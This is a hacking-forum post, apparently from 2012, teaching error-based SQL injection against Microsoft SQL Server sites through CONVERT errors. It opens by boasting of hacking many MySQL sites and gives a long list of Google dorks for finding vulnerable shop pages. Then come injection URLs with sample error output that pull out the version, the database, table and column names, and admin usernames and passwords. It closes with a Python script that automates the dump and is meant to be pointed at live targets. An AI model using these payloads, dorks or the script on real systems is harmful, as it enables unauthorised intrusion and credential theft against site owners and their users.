    SQL INJECTION - Tutorial

    zeusk
    Admin

    Posts : 144
    Join date : 2011-12-04

    Post  zeusk on Thu Jun 21, 2012 7:25 am

    We hacked lots of MySQL sites; now it's time to target Microsoft SQL Server.

    Hope you enjoy it.

    Let's start.

    There are various types of SQL injection against Microsoft SQL Server, as follows:

    1) ODBC error message attack with "CONVERT"
    2) ODBC error message attack with "HAVING" and "GROUP BY"
    3) MSSQL injection with UNION attack
    4) MSSQL injection in web services (SOAP injection)
    5) MSSQL blind SQL injection attack

    I will explain the various methods in separate tutorials.
    For now we start with the easiest method: error-based injection with CONVERT. It only works when the application shows the database error text to the user; a site that hides errors behind a generic page needs method 5 instead.

    STEP 1:
    First we need to find a vulnerable site.

    Add a single quote ('), a double quote (") or a semicolon (;) to the parameter under test. In all the requests below, http://www.example.com/page.asp?id=1 is a placeholder for the target page and its injectable parameter; use whatever page and parameter you are testing.

    eg
    http://www.example.com/page.asp?id=1'
    http://www.example.com/page.asp?id=1"

    If the response shows an error like this, the parameter is injectable:

    [HTTP Response]------------------------------------------------------------------------------
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
    character string ''.
    /news.asp, line 52
    [End HTTP Response]-------------------------------------------------------------------------

    The error could also look like the one below (here the quote landed in the middle of a longer query):

    Microsoft OLE DB Provider for SQL Server error '80040e14 '
    Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
    ..../ main_rub.asp, line 4

    If errors like the above are shown, the site could be vulnerable to SQL injection. Note the page and line number in the error: the injected parameter is often used by an include (a header template, for example), so the error can come from a different file than the one you requested.

    You can also find candidate sites with a Google dork.

    eg

    inurl:page.asp?id=
    inurl:index.asp?sid=

    Code:
    ".asp?bookID="
    ".asp?cart="
    ".asp?cartID="
    ".asp?catalogid="
    ".asp?category_list="
    ".asp?CategoryID="
    ".asp?catID="
    ".asp?cid="
    ".asp?code_no="
    ".asp?code="
    ".asp?designer="
    ".asp?framecode="
    ".asp?id="
    ".asp?idcategory="
    ".asp?idproduct="
    ".asp?intCatalogID="
    ".asp?intProdId="
    ".asp?item_id="
    ".asp?item="
    ".asp?itemID="
    ".asp?maingroup="
    ".asp?misc="
    ".asp?newsid="
    ".asp?order_id="
    ".asp?p="
    ".asp?pid="
    ".asp?ProdID="
    ".asp?product_id="
    ".asp?product="
    ".asp?productid="
    ".asp?showtopic="
    ".asp?Sku="
    ".asp?storeid="
    ".asp?style_id="
    ".asp?StyleID="
    ".asp?userID="
    "about.asp?cartID="
    "accinfo.asp?cartId="
    "acclogin.asp?cartID="
    "add.asp?bookid="
    "add_cart.asp?num="
    "addcart.asp?"
    "addItem.asp"
    "add-to-cart.asp?ID="
    "addToCart.asp?idProduct="
    "addtomylist.asp?ProdId="
    "adminEditProductFields.asp?intProdID="
    "advSearch_h.asp?idCategory="
    "affiliate.asp?ID="
    "affiliate-agreement.cfm?storeid="
    "affiliates.asp?id="
    "ancillary.asp?ID="
    "archive.asp?id="
    "article.asp?id="
    "aspx?PageID"
    "basket.asp?id="
    "Book.asp?bookID="
    "book_list.asp?bookid="
    "book_view.asp?bookid="
    "BookDetails.asp?ID="
    "browse.asp?catid="
    "browse_item_details.asp"
    "Browse_Item_Details.asp?Store_Id="
    "buy.asp?"
    "buy.asp?bookid="
    "bycategory.asp?id="
    "cardinfo.asp?card="
    "cart.asp?action="
    "cart.asp?cart_id="
    "cart.asp?id="
    "cart_additem.asp?id="
    "cart_validate.asp?id="
    "cartadd.asp?id="
    "cat.asp?iCat="
    "catalog.asp"
    "catalog.asp?CatalogID="
    "catalog_item.asp?ID="
    "catalog_main.asp?catid="
    "category.asp"
    "category.asp?catid="
    "category_list.asp?id="
    "categorydisplay.asp?catid="
    "checkout.asp?cartid="
    "checkout.asp?UserID="
    "checkout_confirmed.asp?order_id="
    "checkout1.asp?cartid="
    "comersus_listCategoriesAndProducts.asp?idCategory="
    "comersus_optEmailToFriendForm.asp?idProduct="
    "comersus_optReviewReadExec.asp?idProduct="
    "comersus_viewItem.asp?idProduct="
    "comments_form.asp?ID="
    "contact.asp?cartId="
    "content.asp?id="
    "customerService.asp?TextID1="
    "default.asp?catID="
    "description.asp?bookid="
    "details.asp?BookID="
    "details.asp?Press_Release_ID="
    "details.asp?Product_ID="
    "details.asp?Service_ID="
    "display_item.asp?id="
    "displayproducts.asp"
    "downloadTrial.asp?intProdID="
    "emailproduct.asp?itemid="
    "emailToFriend.asp?idProduct="
    "events.asp?ID="
    "faq.asp?cartID="
    "faq_list.asp?id="
    "faqs.asp?id="
    "feedback.asp?title="
    "freedownload.asp?bookid="
    "fullDisplay.asp?item="
    "getbook.asp?bookid="
    "GetItems.asp?itemid="
    "giftDetail.asp?id="
    "help.asp?CartId="
    "home.asp?id="
    "index.asp?cart="
    "index.asp?cartID="
    "index.asp?ID="
    "info.asp?ID="
    "item.asp?eid="
    "item.asp?item_id="
    "item.asp?itemid="
    "item.asp?model="
    "item.asp?prodtype="
    "item.asp?shopcd="
    "item_details.asp?catid="
    "item_list.asp?maingroup"
    "item_show.asp?code_no="
    "itemDesc.asp?CartId="
    "itemdetail.asp?item="
    "itemdetails.asp?catalogid="
    "learnmore.asp?cartID="
    "links.asp?catid="
    "list.asp?bookid="
    "List.asp?CatID="
    "listcategoriesandproducts.asp?idCategory="
    "modline.asp?id="
    "myaccount.asp?catid="
    "news.asp?id="
    "order.asp?BookID="
    "order.asp?id="
    "order.asp?item_ID="
    "OrderForm.asp?Cart="
    "page.asp?PartID="
    "payment.asp?CartID="
    "pdetail.asp?item_id="
    "powersearch.asp?CartId="
    "price.asp"
    "privacy.asp?cartID="
    "prodbycat.asp?intCatalogID="
    "prodetails.asp?prodid="
    "prodlist.asp?catid="
    "product.asp?bookID="
    "product.asp?intProdID="
    "product_info.asp?item_id="
    "productDetails.asp?idProduct="
    "productDisplay.asp"
    "productinfo.asp?item="
    "productlist.asp?ViewType=Category&CategoryID="
    "productpage.asp"
    "products.asp?ID="
    "products.asp?keyword="
    "products_category.asp?CategoryID="
    "products_detail.asp?CategoryID="
    "productsByCategory.asp?intCatalogID="
    "prodView.asp?idProduct="
    "promo.asp?id="
    "promotion.asp?catid="
    "pview.asp?Item="
    "resellers.asp?idCategory="
    "results.asp?cat="
    "savecart.asp?CartId="
    "search.asp?CartID="
    "searchcat.asp?search_id="
    "Select_Item.asp?id="
    "Services.asp?ID="
    "shippinginfo.asp?CartId="
    "shop.asp?a="
    "shop.asp?action="
    "shop.asp?bookid="
    "shop.asp?cartID="
    "shop_details.asp?prodid="
    "shopaddtocart.asp"
    "shopaddtocart.asp?catalogid="
    "shopbasket.asp?bookid="
    "shopbycategory.asp?catid="
    "shopcart.asp?title="
    "shopcreatorder.asp"
    "shopcurrency.asp?cid="
    "shopdc.asp?bookid="
    "shopdisplaycategories.asp"
    "shopdisplayproduct.asp?catalogid="
    "shopdisplayproducts.asp"
    "shopexd.asp"
    "shopexd.asp?catalogid="
    "shopping_basket.asp?cartID="
    "shopprojectlogin.asp"
    "shopquery.asp?catalogid="
    "shopremoveitem.asp?cartid="
    "shopreviewadd.asp?id="
    "shopreviewlist.asp?id="
    "ShopSearch.asp?CategoryID="
    "shoptellafriend.asp?id="
    "shopthanks.asp"
    "shopwelcome.asp?title="
    "show_item.asp?id="
    "show_item_details.asp?item_id="
    "showbook.asp?bookid="
    "showStore.asp?catID="
    "shprodde.asp?SKU="
    "specials.asp?id="
    "store.asp?id="
    "store_bycat.asp?id="
    "store_listing.asp?id="
    "Store_ViewProducts.asp?Cat="
    "store-details.asp?id="
    "storefront.asp?id="
    "storefronts.asp?title="
    "storeitem.asp?item="
    "StoreRedirect.asp?ID="
    "subcategories.asp?id="
    "tek9.asp?"
    "template.asp?Action=Item&pid="
    "topic.asp?ID="
    "tuangou.asp?bookid="
    "type.asp?iType="
    "updatebasket.asp?bookid="
    "updates.asp?ID="
    "view.asp?cid="
    "view_cart.asp?title="
    "view_detail.asp?ID="
    "viewcart.asp?CartId="
    "viewCart.asp?userID="
    "viewCat_h.asp?idCategory="
    "viewevent.asp?EventID="
    "viewitem.asp?recor="
    "viewPrd.asp?idcategory="
    "ViewProduct.asp?misc="
    "voteList.asp?item_ID="
    "whatsnew.asp?idCategory="
    "WsAncillary.asp?ID="
    "WsPages.asp?ID="
    STEP 2:

    Now we have our vulnerable website.
    CONVERT(int, x) tries to turn x into an integer. When x is a string that is not a number, SQL Server raises a conversion error, and the error message quotes the offending string. Anything we place inside CONVERT therefore comes back to us verbatim in the error page, as long as it is not purely numeric (a numeric string converts cleanly and nothing is shown).

    We start the assessment by finding the MSSQL version and the DB name.

    http://www.example.com/page.asp?id=1+and+1=convert(int,@@version)--

    [http response]-------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
    (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

    /includes/templates/header.asp, line 21

    -----------------------------------------------------------

    We now know it is Microsoft SQL Server 2005 Standard Edition on Windows NT 5.2, i.e. Windows Server 2003 (Build 3790: Service Pack 2).

    Let's enumerate the DB name.

    http://www.example.com/page.asp?id=1+and+1=convert(int,db_name())--

    [http response]--------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'IPC' to data type int.

    /includes/templates/header.asp, line 21
    ------------------------------------------------------------

    The database name is IPC.

    The same request with a function that returns the current login (system_user is used here as the example) tells us which account the application connects as:

    http://www.example.com/page.asp?id=1+and+1=convert(int,system_user)--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'ipcdc' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------

    The login operating the database is ipcdc.

    STEP 3:
    NOW LET'S FIND THE TABLES IN THE DATABASE

    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--

    "information_schema.tables" holds one row per table in the database, and its "table_name" column holds the name of each table. "SELECT TOP 1" returns a single row, which is what CONVERT needs: a subquery that returns more than one row is itself an error. Without an ORDER BY the row SQL Server returns first is not guaranteed, but the NOT IN exclusion used below still walks through every table.
    The result of this request is something like this:

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'siteStatus' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------

    So from this error we know the first table is "siteStatus". The next step is to look for the second table:
    we only append a WHERE clause to the subquery of the previous request.
    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus')))--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------

    Second table: 'headerGraphic'
    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic')))--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'admin' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    Third table: 'admin'

    In this way you get each table name from the error.
    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('siteStatus','headerGraphic','admin')))--

    If the query returns something like this:

    [http response]----------------------------------------
    ADODB.Field error '800a0bcd'
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    /page.asp, line 22

    -----------------------------------------------------------------

    IT MEANS THE DATABASE CONTAINS ONLY 3 TABLES: 'siteStatus', 'headerGraphic' and 'admin'.
    The subquery now returns no row, so CONVERT receives NULL and raises no error; "1 = NULL" is not true, the page's own query returns an empty recordset, and the ASP code fails when it reads a field from it. This error comes from the page, not from SQL Server, and it is the signal to stop.

    STEP 4:
    Now we are all set, and we will find the columns in the admin table.

    We merely change "information_schema.tables" to "information_schema.columns" and "table_name" to "column_name",
    but we have to add "table_name" to the WHERE clause to specify the table whose column names we pull.
    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'))--

    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'username' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='admin'+and+column_name+not+in+('username')))--

    The response will be:
    [http response]----------------------------------------
    Microsoft OLE DB Provider for SQL Server error '80040e07'

    Conversion failed when converting the nvarchar value 'passwd' to data type int.

    /includes/templates/header.asp, line 21
    -------------------------------------------------------------
    So the 2nd column is 'passwd'.


    CONTINUE THE SAME URL MANIPULATION AS FOR THE TABLES,
    ADDING EACH NEW COLUMN NAME TO THE NOT IN LIST IN THE WHERE CLAUSE,
    UNTIL YOU GET AN ERROR LIKE THIS:
    [http response]----------------------------------------
    ADODB.Field error '800a0bcd'
    Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
    /page.asp, line 22

    -----------------------------------------------------------------

    STEP 5: RETRIEVING USERNAME AND PASSWORD etc.

    Now let's see what we got from above.

    table_name: 'admin', 'siteStatus' and 'headerGraphic'

    Here we are interested in 'admin'. So we found the columns of 'admin':

    column_name: 'username' and 'passwd'

    Let's do our work now.

    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+username+from+admin))--
    You will get the first username in the error,
    eg sa_admin
    http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+passwd+from+admin))--

    You will get the passwd,
    eg comic123


    So you now have a login for the application's admin area:

    USERNAME: sa_admin
    PASSWORD: comic123

    Note that these come from the application's own 'admin' table; they are not a SQL Server login, and the database connection is still running as the account found in step 2.
    [note:
    1) you can use AND or OR
    2) don't forget the , (comma) after 'int' in convert()
    3) in the error, the text after the ' (upper comma) is your table_name, column_name or value
    4) you can enumerate more usernames and passwords with the same NOT IN exclusion used for tables and columns, adding each recovered value to the list
    5) a value that is purely numeric converts to int without an error, so it never appears this way and the request just returns the BOF/EOF error; only non-numeric strings leak]
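
    The whole procedure from steps 3 to 5, automated, as an added example in Python (not code from the original post): it builds the CONVERT payloads, pulls the leaked string out of the ODBC error text, and loops TOP 1 / NOT IN until the BOF/EOF error says a subquery has run dry, stopping instead of spinning when a value converts cleanly (note 5 above). So that it runs offline it is driven against a constructed stand-in target, an in-memory SQLite database seeded with the three tables and the admin row shown above and wrapped in a fetch() that answers with the same error texts; http://www.example.com/page.asp?id=1 is a placeholder for the injectable page. With a live target you replace the stand-in with a function that fetches the URL and returns the response body.

```python
"""Error-based MSSQL enumeration through CONVERT(int, ...): build the tutorial's
payloads, parse the leaked value out of the ODBC error, and run the TOP 1 / NOT IN
loop until the ADODB BOF/EOF error says the subquery has run dry."""
import re
import sqlite3
from urllib.parse import unquote_plus

# Error signatures copied from the HTTP responses shown in the tutorial.
CONVERT_LEAK = re.compile(
    r"Conversion failed when converting the \w+ value '(.*?)' to data type int", re.S)
NO_ROWS = re.compile(r"Either BOF or EOF is True")


def build_url(base, subquery):
    """base is the page with its legitimate parameter value (placeholder page here);
    the subquery is wrapped in the tutorial's 'and 1=convert(int,(...))--' test,
    spaces encoded as '+' the way the tutorial writes its URLs."""
    return base + "+and+1=convert(int,(" + subquery.replace(" ", "+") + "))--"


def leaked_value(body):
    """The string SQL Server echoed in the failed conversion, or None if there was none."""
    m = CONVERT_LEAK.search(body)
    return m.group(1) if m else None


def enumerate_column(fetch, base, column, table, extra_where=""):
    """Every value of `column` in `table`, one request per value. TOP 1 gives one row;
    a growing NOT IN list excludes what we already have; the loop ends when the page
    throws the BOF/EOF error, i.e. the subquery returned no row and the WHERE failed."""
    found = []
    while True:
        clauses = [extra_where] if extra_where else []
        if found:
            quoted = ",".join("'" + v.replace("'", "''") + "'" for v in found)
            clauses.append(f"{column} not in ({quoted})")
        sub = f"select top 1 {column} from {table}"
        if clauses:
            sub += " where " + " and ".join(clauses)
        body = fetch(build_url(base, sub))
        if NO_ROWS.search(body):
            return found
        value = leaked_value(body)
        if value is None or value in found:
            # No conversion error: a purely numeric value converts cleanly (CONVERT never
            # complains, so it is invisible to this technique), or the page swallowed
            # the error. Either way the loop could not advance, so stop instead of spinning.
            raise RuntimeError(f"no usable error for: {sub}")
        found.append(value)


def dump(fetch, base):
    """Steps 3 to 5 of the tutorial end to end: table names, then the columns of
    'admin', then every value of those columns."""
    tables = enumerate_column(fetch, base, "table_name", "information_schema.tables")
    columns = enumerate_column(fetch, base, "column_name",
                               "information_schema.columns", "table_name='admin'")
    rows = {c: enumerate_column(fetch, base, c, "admin") for c in columns}
    return tables, columns, rows


def make_fake_target():
    """Constructed stand-in for the tutorial's target, not a real MSSQL host: SQLite
    seeded with the three tables and the admin row the tutorial recovered, plus a
    hand-made information_schema. fetch() answers the way the ASP page did: the
    CONVERT error when the subquery yields text, the ADODB BOF/EOF error when it
    yields no row (convert(int, NULL) is NULL, so 'and 1=NULL' empties the recordset)."""
    db = sqlite3.connect(":memory:")
    db.execute("attach database ':memory:' as information_schema")
    db.executescript("""
        create table siteStatus(id integer); create table headerGraphic(id integer);
        create table admin(username text, passwd text);
        insert into admin values ('sa_admin', 'comic123');
        create table information_schema.tables(table_name text);
        create table information_schema.columns(table_name text, column_name text);
        insert into information_schema.tables values ('siteStatus'), ('headerGraphic'), ('admin');
        insert into information_schema.columns values ('admin', 'username'), ('admin', 'passwd');
    """)
    err = ("Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
           "Conversion failed when converting the nvarchar value '{}' to data type int.\n"
           "/includes/templates/header.asp, line 21")
    eof = ("ADODB.Field error '800a0bcd'\nEither BOF or EOF is True, or the current record "
           "has been deleted. Requested operation requires a current record.\n/page.asp, line 22")

    def fetch(url):
        sub = unquote_plus(url.split("convert(int,(", 1)[1].rsplit("))--", 1)[0])
        sub = sub.replace("select top 1 ", "select ", 1) + " limit 1"  # T-SQL TOP -> SQLite LIMIT
        row = db.execute(sub).fetchone()
        if row is None:
            return eof
        try:
            int(str(row[0]))           # numeric text converts cleanly: ordinary page, no leak
            return "<html>normal page</html>"
        except ValueError:
            return err.format(row[0])
    return fetch


if __name__ == "__main__":
    # Placeholder injectable page; against a live target pass a function that GETs the
    # URL (urllib.request) and returns the body instead of make_fake_target().
    print(dump(make_fake_target(), "http://www.example.com/page.asp?id=1"))
```

    Each value costs one request, and the NOT IN list grows with every value found, so URLs get long on wide tables; that is also why purely numeric values are a problem for this technique, since the request that should leak them just returns the BOF/EOF error and looks like the end of the data.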